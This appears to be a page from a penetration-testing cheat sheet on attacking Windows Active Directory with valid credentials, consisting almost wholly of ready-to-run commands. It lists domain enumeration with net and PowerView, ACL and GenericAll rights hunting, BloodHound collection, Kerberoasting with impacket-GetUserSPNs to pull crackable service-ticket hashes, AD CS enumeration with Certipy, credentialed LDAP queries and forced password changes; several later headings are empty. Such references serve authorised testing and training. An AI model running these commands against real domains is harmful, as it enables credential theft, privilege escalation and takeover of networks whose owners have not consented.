Valid Credentials

Enumeration

Using Windows Legacy Tools

net user /domain
net user <USERNAME> /domain
net group /domain
net group "<GROUP>" /domain

PowerView

Get Domain Information

Get-NetDomain

Get User List

Get-NetUser

Get a specific User

Get-NetUser "user"

Enumerate Password Change && Last Login

Get-NetUser | select cn,pwdlastset,lastlogon

Get Groups

Get-NetGroup

Get a specific Group

Get-NetGroup "Domain Admins"

Get Members of groups

Get-NetGroup "Domain Admins" | select member

List Domain Shares

Find-DomainShare

Get Computer Objects

Get-NetComputer 
Get-NetComputer | select operatingsystem,dnshostname

Check if we are ADMIN on other Computers

Find-LocalAdminAcess

Check for Logged Users

Get-NetSession -ComputerName files04 -Verbose
.\PsLoggedon.exe

Enumerate ACL

Get-ObjectAcl -Identity "user"

In order to make sense of the SID, we can use PowerView's Convert-SidToName command to convert it to an actual domain object name:

Convert-SidToName S-1-5-21-1987370270-658905905-1781884369-1104

"S-1-5-21-1987370270-658905905-1781884369-512","S-1-5-21-1987370270-658905905-1781884369-1104","S-1-5-32-548","S-1-5-18","S-1-5-21-1987370270-658905905-1781884369-519" | Convert-SidToName

Enumerate GenericAll in the domain

Get-ObjectAcl -Identity "Management Department" | ? {$_.ActiveDirectoryRights -eq "GenericAll"} | select SecurityIdentifier,ActiveDirectoryRights

Enumerate SPN

Get-NetUser -SPN | select samaccountname,serviceprincipalname

Service Principal Name (SPN) Enumeration

setspn -L iis_service
nslookup.exe <RHOST>

Get all the users

GetADUsers.py -all -dc-ip <dc-ip> <domain>/<username>

Enumerate SMB Shares

cme smb <ip> -u <user> -p <password> --shares

BloodHound

bloodhound-python -d <domain> -u <user> -p <password> -ns <dc-ip> -c all

Kerberoasting

Get Kerberoastable users

Get-DomainUser -SPN -Properties SamAccountName, ServicePrincipalName-d

Get Hash

sudo impacket-GetUserSPNs -request -dc-ip 192.168.50.70 <domain/user>

If impacket-GetUserSPNs throws the error "KRB_AP_ERR_SKEW(Clock skew too great)," we need to synchronize the time of the Kali machine with the domain controller. We can use rdate to do so.

rdate -n [IP of Target]

Hash Cracking

ADCS Enumeration

certipy-ad find -username 'user' -password 'password' -dc-ip <IP>

Active Directory Certificate Services (AD CS)

Exploit

If we found known vulnerabilities you should exploit them for compromising more systems:

Known Vulnerabilities

Connect to computers

Lateral Move

WinPeas

Upload WinPeas for more in depth enumeration

LDAP

ldapsearch -h <domain> -D <user>@<domain> -w '<password hash>'
-b "dc=support,dc=htb" "*"

Change User Password

If we got "STATUS_PASSWORD_MUST_CHANGE" for some users, we can update a current password to a new one.

smbpasswd -r <ip> -U <username>

PreviousWith Username NextLateral Move

Last updated 5 months ago

hashtagEnumeration

hashtagUsing Windows Legacy Tools

hashtagPowerView

hashtagService Principal Name (SPN) Enumeration

hashtagGet all the users

hashtagEnumerate SMB Shares

hashtagBloodHound

hashtagKerberoasting

hashtagGet Kerberoastable users

hashtagGet Hash

hashtagHash Cracking

hashtagADCS Enumeration

hashtagActive Directory Certificate Services (AD CS)

hashtagExploit

hashtagConnect to computers

hashtagWinPeas

hashtagLDAP

hashtagChange User Password